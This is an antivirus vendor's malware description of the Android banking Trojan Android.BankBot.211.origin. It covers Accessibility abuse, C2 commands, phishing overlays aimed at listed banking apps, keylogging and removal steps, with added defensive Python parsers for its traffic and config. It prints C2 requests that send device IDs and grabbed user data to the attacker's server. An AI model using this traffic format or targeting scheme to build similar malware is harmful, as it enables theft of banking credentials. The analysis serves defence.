Android.BankBot.211.origin

Added to Dr.Web virus database: 2017-07-20
Virus description was added: 2017-07-20

SHA1:

1fac76cff16887f695f557d849650cf10bcb1adb

A malicious program for Android mobile devices: a banking Trojan that steals confidential information and executes cybercriminals’ commands. Android.BankBot.211.origin is distributed under the guise of benign programs.

Once installed and launched, Android.BankBot.211.origin repeatedly (in an infinite loop) tries to obtain access to the Accessibility Service by blocking normal device operation with a window that requests the corresponding permission.


After the user is forced to grant the Trojan the necessary rights, Android.BankBot.211.origin adds itself to the device administrator list, assigns itself as the default SMS manager and gains access to the screen-capture functions (the MediaProjection class is used for this purpose). Each of these actions normally requires the user’s consent; however, once it has Accessibility Service access, the malicious program performs them automatically by clicking the confirmation buttons itself.


If the device’s owner attempts to remove the Trojan from the administrator list, Android.BankBot.211.origin automatically clicks “Cancel”. In other cases it clicks “Back” using the performGlobalAction method.

After successfully infecting the device, the Trojan reports this to the command and control server with a request of the following form:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience

Then it waits for the server’s commands:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=poll&imei=86**********554

The Trojan can execute the following commands:

  • number_1/prefix_1—send an SMS with the text from the parameter prefix_1 to the number from the parameter number_1;
  • call_log—forward to the server information about the installed applications, contact list and phone call data;
  • sms_history—send to the server SMS stored in the device memory;
  • url—open the specified link;
  • server—change the address of the command and control server;
  • intercept—add the phones parameter and the received phone-number values to the reservas table;
  • server_poll—add the interval parameter and the received values to the reservas table.

Besides that, Android.BankBot.211.origin intercepts all incoming messages and sends information about them to the server.

The Trojan periodically connects to its command and control server at the address http://217.***.***.92/jack.zip. The archive at that link contains an ordinary text file. To retrieve it, Android.BankBot.211.origin sends a POST request of the following form:

POST http://217.***.***.92/jack.zip HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; [device model] Build/LMY47D)
Host: 217.***.***.92
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
_AUTH=86**********554
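The three C2 message shapes shown above (the reg beacon, the poll beacon and the _AUTH config fetch) share a structure that is easy to match in an HTTP proxy log. The following is an added example, not Dr.Web's code: it classifies constructed sample requests modelled on the masked ones in this description. The host 203.0.113.10, the IMEI 860000000000554 and the op value are placeholders; the path, parameter names and version string are taken from the requests quoted above.

```python
"""Classify Android.BankBot.211.origin-style C2 traffic in an HTTP proxy log.

Added example, not Dr.Web's code. The host, IMEI and op values below are
constructed placeholders modelled on the masked values in the writeup.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: one dict per request, as a proxy might export them.
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "http://203.0.113.10/v83a59w4h/s991802.php",
     "body": "action=reg&imei=860000000000554&phone=&op=00000"
             "&version=5.1%2C3.10.65-svn944&prefix=experience"},
    {"method": "POST", "url": "http://203.0.113.10/v83a59w4h/s991802.php",
     "body": "action=poll&imei=860000000000554"},
    {"method": "POST", "url": "http://203.0.113.10/jack.zip",
     "body": "_AUTH=860000000000554"},
    {"method": "POST", "url": "https://example.org/login",
     "body": "user=alice&password=hunter2"},
    {"method": "GET", "url": "http://203.0.113.10/jack.zip", "body": ""},
]


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def classify(req):
    """Return the C2 message kind for one request, or None if it looks benign.

    Kinds follow the writeup: "reg" and "poll" beacons carry action=... plus
    an imei; the config download is a POST to a .zip path whose only form
    field is _AUTH=<imei>.
    """
    if req["method"] != "POST":
        return None
    form = parse_form(req["body"])
    path = urlsplit(req["url"]).path
    if form.get("action") in ("reg", "poll") and "imei" in form:
        return form["action"]
    if path.endswith(".zip") and set(form) == {"_AUTH"}:
        return "config_fetch"
    return None


def c2_findings(requests):
    """One finding per C2 message: host, path, kind and the device id used."""
    findings = []
    for req in requests:
        kind = classify(req)
        if kind is None:
            continue
        form = parse_form(req["body"])
        parts = urlsplit(req["url"])
        findings.append({
            "host": parts.netloc,
            "path": parts.path,
            "kind": kind,
            "device_id": form.get("imei") or form.get("_AUTH"),
            # the reg beacon also reports OS/kernel version and a campaign prefix
            "version": form.get("version"),
            "prefix": form.get("prefix"),
        })
    return findings


def device_ids_by_host(requests):
    """Group device ids per C2 host: one device talking to a host through
    several message kinds is the pattern to escalate on."""
    grouped = {}
    for f in c2_findings(requests):
        grouped.setdefault(f["host"], set()).add(f["device_id"])
    return grouped


if __name__ == "__main__":
    for finding in c2_findings(SAMPLE_REQUESTS):
        print(finding)
    print(device_ids_by_host(SAMPLE_REQUESTS))
```

The matching deliberately keys on the parameter names and message structure rather than on the C2 address, since the server command documented above lets the operator change that address at any time.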

In response, the malicious program receives a configuration file encrypted with the AES algorithm. This file holds the parameters of the attack on the applications installed on the device: the names of the targeted programs, the link to the phishing form parameters and the type of action to perform. Example:

config 
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]

where:

  • lock—attack on anti-virus programs and other software that can interfere with the Trojan’s operation (when such applications are launched, Android.BankBot.211.origin automatically clicks “Back”);
  • window—display of a phishing settings window of a payment service that requests bank card information;
  • fullscreen—display of a phishing window for input of login credentials during the launch of applications for operation with mobile banking and payment systems.
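A defender who recovers a decrypted config of this shape wants to know which installed packages it targets and how. The following is an added example, not Dr.Web's code: it loads the sample config quoted above (with its masked link addresses kept verbatim), turns it into a package lookup table and matches it against a constructed list of installed packages. The installed-package list and the org.example.notes name are placeholders.

```python
"""Parse a decrypted Android.BankBot.211.origin-style target config and match it
against a device's installed packages.

Added example, not Dr.Web's code. The JSON below is the sample from the
writeup with its masked link addresses kept as-is; the installed-package
list is constructed.
"""
import json

# Sample config as shown in the writeup: one lock entry, one window entry,
# one fullscreen entry.
CONFIG_JSON = '''
[
  {"name": "lock_av", "type": "lock", "link": "no_link",
   "apps": ["com.kms.free", "com.drweb",
            "screenmirroring.agillaapps.com.screenmirroring",
            "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
   "s_flow": 1},
  {"name": "google_play", "type": "window",
   "link": "http://217.***.***.92/link/GooglePlay2/index.html",
   "apps": ["com.google.android.finsky.activities", "com.google.android.music",
            "com.android.vending"],
   "s_flow": 2},
  {"name": "Akbank", "type": "fullscreen",
   "link": "http://217.***.***.92/link/Akbank/index.html",
   "apps": ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
   "s_flow": 2}
]
'''

# Meaning of each "type" value, as described in the writeup.
TYPE_MEANING = {
    "lock": "launch blocked (Trojan presses Back)",
    "window": "phishing card-details window overlaid",
    "fullscreen": "full-screen phishing login overlaid",
}


def load_targets(config_text):
    """Map package name -> {name, type, link} for every app listed in the config.

    A package listed under several entries keeps the first one, so the
    returned dict works as a plain lookup table.
    """
    targets = {}
    for entry in json.loads(config_text):
        if entry.get("type") not in TYPE_MEANING:
            raise ValueError(f"unknown entry type: {entry.get('type')!r}")
        for pkg in entry["apps"]:
            targets.setdefault(pkg, {"name": entry["name"],
                                     "type": entry["type"],
                                     "link": entry["link"]})
    return targets


def phishing_links(config_text):
    """Collect the overlay page URLs, which are worth blocking at the proxy."""
    return sorted({e["link"] for e in json.loads(config_text)
                   if e["type"] in ("window", "fullscreen")})


def exposure_report(config_text, installed_packages):
    """List the installed packages the config would attack, with the attack kind."""
    targets = load_targets(config_text)
    report = []
    for pkg in sorted(installed_packages):
        if pkg in targets:
            t = targets[pkg]
            report.append((pkg, t["type"], TYPE_MEANING[t["type"]], t["link"]))
    return report


# Constructed list of packages on a hypothetical device.
INSTALLED = ["com.android.vending", "com.drweb", "com.akbank.softotp",
             "org.example.notes"]

if __name__ == "__main__":
    for pkg, kind, meaning, link in exposure_report(CONFIG_JSON, INSTALLED):
        print(f"{pkg}: {kind} ({meaning}) link={link}")
    print(phishing_links(CONFIG_JSON))
```

Decrypting the file is left out because the description does not give the key or cipher mode; the parser starts from the plaintext JSON shown above.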

The Trojan displays phishing input forms during the launch of the following applications:

  • com.akbank.android.apps.akbank_direkt – Akbank Direkt;
  • com.akbank.softotp – Akbank Direkt Şifreci;
  • com.finansbank.mobile.cepsube – QNB Finansbank Cep Şubesi;
  • com.garanti.cepsubesi – Garanti Mobile Banking;
  • com.garanti.cepbank – Garanti CepBank;
  • biz.mobinex.android.apps.cep_sifrematik – Garanti Cep Şifrematik;
  • com.pozitron.iscep – İşCep;
  • com.ykb.android – Yapı Kredi Mobile;
  • com.ziraat.ziraatmobil – Ziraat Mobil;
  • com.dbs.sg.dbsmbanking – DBS digibank SG;
  • com.dbs.sg.posbmbanking – POSB digibank SG;
  • com.dbs.dbspaylah – DBS PayLah!;
  • com.dbshk – DBS mBanking Hong Kong;
  • com.dbs.businessclass – DBS BusinessClass;
  • com.dbs.quickcredit.sg – DBS Quick Credit;
  • de.comdirect.android – comdirect mobile App;
  • de.commerzbanking.mobil – Commerzbank Banking App;
  • de.consorsbank – Consorsbank;
  • com.db.mm.deutschebank – Meine Bank;
  • de.dkb.portalapp – DKB-Banking;
  • com.ing.diba.mbbr2 – ING-DiBa Banking + Brokerage;
  • de.postbank.finanzassistent – Postbank Finanzassistent;
  • mobile.santander.de – Santander MobileBanking;
  • com.starfinanz.smob.android – Sparkasse;
  • de.fiducia.smartphone.android.banking.vr – VR-Banking;
  • pl.mbank – mBank PL;
  • eu.eleader.mobilebanking.pekao – Bank Pekao;
  • pl.pkobp.iko – IKO;
  • com.comarch.mobile – Alior Mobile;
  • com.getingroup.mobilebanking – Getin Mobile;
  • pl.ing.ingmobile – INGMobile;
  • pl.ing.mojeing – Moje ING mobile;
  • org.banksa.bank – BankSA Mobile Banking;
  • com.ifs.banking.fiid3767 – BANKWEST OF KANSAS;
  • com.commbank.netbank – CommBank;
  • com.cba.android.netbank – CommBank app for tablet;
  • au.com.ingdirect.android – ING DIRECT Australia Banking;
  • au.com.nab.mobile – NAB;
  • org.stgeorge.bank – St.George Mobile Banking;
  • org.banking.tablet.stgeorge – St.George Tablet Banking;
  • org.westpac.bank – Westpac Mobile Banking;
  • fr.creditagricole.androidapp – Ma Banque;
  • fr.axa.monaxa – Mon AXA;
  • fr.banquepopulaire.cyberplus – Banque Populaire;
  • net.bnpparibas.mescomptes – Mes Comptes BNP Paribas;
  • com.boursorama.android.clients – Boursorama Banque;
  • com.caisseepargne.android.mobilebanking – Banque;
  • fr.lcl.android.customerarea – Mes Comptes – LCL pour mobile;
  • mobi.societegenerale.mobile.lappli – L'Appli Société Générale;
  • uk.co.bankofscotland.businessbank – Bank of Scotland Business;
  • com.grppl.android.shell.BOS – Bank of Scotland Mobile Bank;
  • com.barclays – Barclays Mobile Banking;
  • com.grppl.android.shell.halifax – Halifax Mobile Banking app;
  • com.htsu.hsbcpersonalbanking – HSBC Mobile Banking;
  • com.grppl.android.shell.CMBlloydsTSB73 – Lloyds Bank Mobile Banking;
  • com.lloydsbank.businessmobile – Lloyds Bank Business;
  • santander – Santander;
  • com.ifs.banking.fiid4202 – TSBBank Mobile Banking;
  • com.fi6122.godough – TSB Mobile;
  • com.rbs.mobile.android.ubr – Ulster Bank ROI;
  • com.rbs.mobile.android.natwestoffshore – NatWest Offshore;
  • com.rbs.mobile.android.natwest – NatWest;
  • com.rbs.mobile.android.natwestbandc – NatWest Business Banking;
  • com.speedway.mobile – Speedway Fuel & Speedy Rewards;
  • com.paypal.android.p2pmobile – PayPal;
  • com.ebay.mobile – eBay;
  • com.google.android.music – Google Play Music;
  • com.android.vending – Google Play.

Android.BankBot.211.origin interferes with the operation of the following programs:

  • com.drweb – Dr.Web Security Space;
  • com.kms.free – Kaspersky Mobile Antivirus;
  • screenmirroring.agillaapps.com.screenmirroring – Screen Mirroring Assistant;
  • com.huawei.android.mirrorshare – 无线分享;
  • com.antivirus – AVG AntiVirus;
  • com.eset.ems2.gp – ESET32 – ESET Mobile Security & Antivirus.

Examples of the fraudulent input forms and phishing windows Android.BankBot.211.origin can display:


The Trojan collects information about all launched applications and the user’s actions within them. To do so, it tracks the following AccessibilityEvent types:

  • TYPE_VIEW_TEXT_CHANGED;
  • TYPE_VIEW_FOCUSED;
  • TYPE_VIEW_LONG_CLICKED;
  • TYPE_NOTIFICATION_STATE_CHANGED;
  • TYPE_VIEW_SELECTED;
  • TYPE_WINDOW_STATE_CHANGED;
  • TYPE_VIEW_CLICKED.

This lets the malicious program track the text fields available in programs (menu elements, for example), log keystrokes and observe other user-interface components. The obtained data is sent to the command and control server. Example of the information sent:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 708
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=grabbed_data&imei=86**********554&data={"app":"com.sprd.fileexplorer","report":"Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\nData: [radio] Быстрый просмотр\n[text] Аудио\n[text] Изображения\n[text] Видео\n[text] Документация\n[text] Приложения\n[text] \/storage\/emulated\/0\n[text] Alarms\n[text] Дата:2015-01-01 03:16:44\n[text] Android\n[text] Дата:2015-01-01 03:17:07\n[text] com.kingroot.kinguser\n[text] Дата:2017-07-11 13:27:37\n[text] DCIM\n[text] Дата:2017-07-11 13:27:45\n[text] documents\n[text] Дата:2017-07-07 14:09:51\n[text] Download\n[text] Дата:2017-07-13 12:27:54\n[text] Fonts\n[text] Дата:2017-07-12 18:33:49\n[text] Kingroot\n[text] Дата:2017-07-07 14:34:11"}
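The grabbed_data upload above packs a whole screen's worth of UI elements into one report string, so triage starts with decoding it. The following is an added example, not Dr.Web's code: it parses a constructed body laid out like the one quoted above (action, imei, and a JSON data field whose report has Grabbed:, State: and Data: header lines followed by one "[kind] text" entry per element). The IMEI, the app name com.example.files and the element texts are placeholders.

```python
"""Decode a grabbed_data upload into structured fields for triage.

Added example, not Dr.Web's code. The body below is constructed in the same
shape as the writeup's sample; the IMEI, app name and element texts are
placeholders.
"""
import json
import re
from urllib.parse import parse_qs, urlencode

# Constructed report text in the writeup's layout: two header lines, then one
# "[kind] text" entry per UI element, the first of them on the "Data:" line.
SAMPLE_REPORT = (
    "Grabbed: com.example.files\n"
    "State: TYPE_WINDOW_STATE_CHANGED\n"
    "Data: [radio] Quick view\n"
    "[text] Audio\n"
    "[text] /storage/emulated/0\n"
    "[text] Download\n"
    "[text] Date:2017-07-13 12:27:54"
)
SAMPLE_BODY = urlencode({
    "action": "grabbed_data",
    "imei": "860000000000554",
    "data": json.dumps({"app": "com.example.files", "report": SAMPLE_REPORT}),
})

# One captured UI element: "[radio] Quick view", "[text] Download", ...
ITEM_RE = re.compile(r"^\[(?P<kind>[A-Za-z_]+)\] ?(?P<text>.*)$")


def parse_grabbed_data(body):
    """Return {imei, app, state, items} for a grabbed_data body, else None."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if form.get("action") != "grabbed_data" or "data" not in form:
        return None
    payload = json.loads(form["data"])
    header, items = {}, []
    for line in payload["report"].split("\n"):
        m = ITEM_RE.match(line)
        if m:
            items.append((m.group("kind"), m.group("text")))
            continue
        key, sep, value = line.partition(":")
        if sep:
            header[key.strip().lower()] = value.strip()
    # The "Data:" header line carries the first element inline.
    m = ITEM_RE.match(header.get("data", ""))
    if m:
        items.insert(0, (m.group("kind"), m.group("text")))
    return {
        "imei": form.get("imei"),
        "app": payload.get("app") or header.get("grabbed"),
        "state": header.get("state"),
        "items": items,
    }


def element_counts(record):
    """Count captured elements per widget kind: a quick measure of how much of
    a screen one accessibility event leaked."""
    counts = {}
    for kind, _ in record["items"]:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    rec = parse_grabbed_data(SAMPLE_BODY)
    print(rec["app"], rec["state"], element_counts(rec))
    for kind, text in rec["items"]:
        print(f"  [{kind}] {text}")
```

parse_qs accepts both a percent-encoded body (as produced here by urlencode) and the unencoded form in which the request is printed above, so the same function can be run over either capture style.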

Besides that, Android.BankBot.211.origin monitors keyboard operation and steals what the user types. On each keystroke the Trojan takes a screenshot and sends the resulting images to the command and control server. This lets the malicious program steal passwords as well, since it captures them quickly enough before the characters are masked. Data entered into visible fields is also duplicated in the POST request that is sent.


The Trojan prevents its removal and does not allow the user to revoke the extended permissions it has obtained. To get rid of Android.BankBot.211.origin, perform the following actions:

  • Boot the infected device in safe mode;
  • Open the system settings and go to the list of device administrators;
  • Find the Trojan in this list and revoke the corresponding rights (here Android.BankBot.211.origin displays a warning about the inevitable loss of all important data, but this is only a decoy);
  • Restart the device, perform a full scan with an anti-virus and remove the Trojan once the scan is complete.

Curing recommendations

Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

© Doctor Web
2003 — 2018
